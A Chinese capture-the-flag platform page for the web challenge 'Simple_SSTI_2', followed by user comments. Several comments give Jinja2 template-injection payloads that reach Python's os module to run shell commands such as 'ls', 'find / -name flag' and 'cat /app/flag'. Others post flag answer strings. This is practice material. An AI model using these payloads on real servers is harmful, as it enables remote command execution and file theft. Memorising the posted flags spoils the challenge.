Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 14555
提  示:
描  述:
Simple_SSTI_2
评论
qiqiguren 15天前

题解详细步骤:http://t.csdnimg.cn/yZlnn

回复 2

是呆瓜蔚呀 17天前

flag{f231bce175908e8fec554031a6232a55}

回复 0

htttpss 24天前

flag{c75b03620c73371a0e8f249354e0bd57} ?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}即可

回复 0

3166235571 25天前

是这个flag{561f38d2a44d42ca8847575a2e144b2b} so easy

回复 0

2280443298 26天前

{{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}

回复 1

zhenbuhuiweb 1月前

flag{d15e0ca95ddb50b992109b24c82cfe5a}

回复 0

ssln 3月前

114.67.175.224:12792/?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}} 看不懂,应该是什么固定格式,修改“ls”即可执行命令

回复 0

210470qq 4月前

flag{43b52fa732d6f8ccbfacea9e989ac07b}

回复 0

songci 4月前

ssti模板注入,尝试获取OS module进行命令执行或文件读取,使用init.globals来看看有没有os module或者其他的可以读写文件的,爆破获取300存在:{{"".__class__.__mro__[1].__subclasses__()[300].__init__.__globals__}},进行命令执行获取flag:?flag={{""

回复 1

Mirabelle 4月前

?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}; ?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

回复 3

WriteUp

image
valecalida

5 金币

评分(14)

解题动态

llllllllllllllllllll 攻破了该题 7分钟前
KomorebiX03 攻破了该题 1小时前
whichhhh 攻破了该题 2小时前
对攻击不敢兴趣 攻破了该题 2小时前
17744343607 攻破了该题 2小时前
aichiyuanweiji 攻破了该题 2小时前
1343966985 攻破了该题 2小时前
xingxing357 攻破了该题 2小时前
lotuswhite 攻破了该题 3小时前
15835339396 攻破了该题 7小时前
980702918 攻破了该题 18小时前
tianxia96 攻破了该题 19小时前
wang598842739 攻破了该题 20小时前
3035187510 攻破了该题 21小时前
hackbar 攻破了该题 22小时前
菜鸟@ 攻破了该题 1天前
zyw666 攻破了该题 1天前
lvchunyun 攻破了该题 1天前
洛伊大王 攻破了该题 1天前
2023031011 攻破了该题 1天前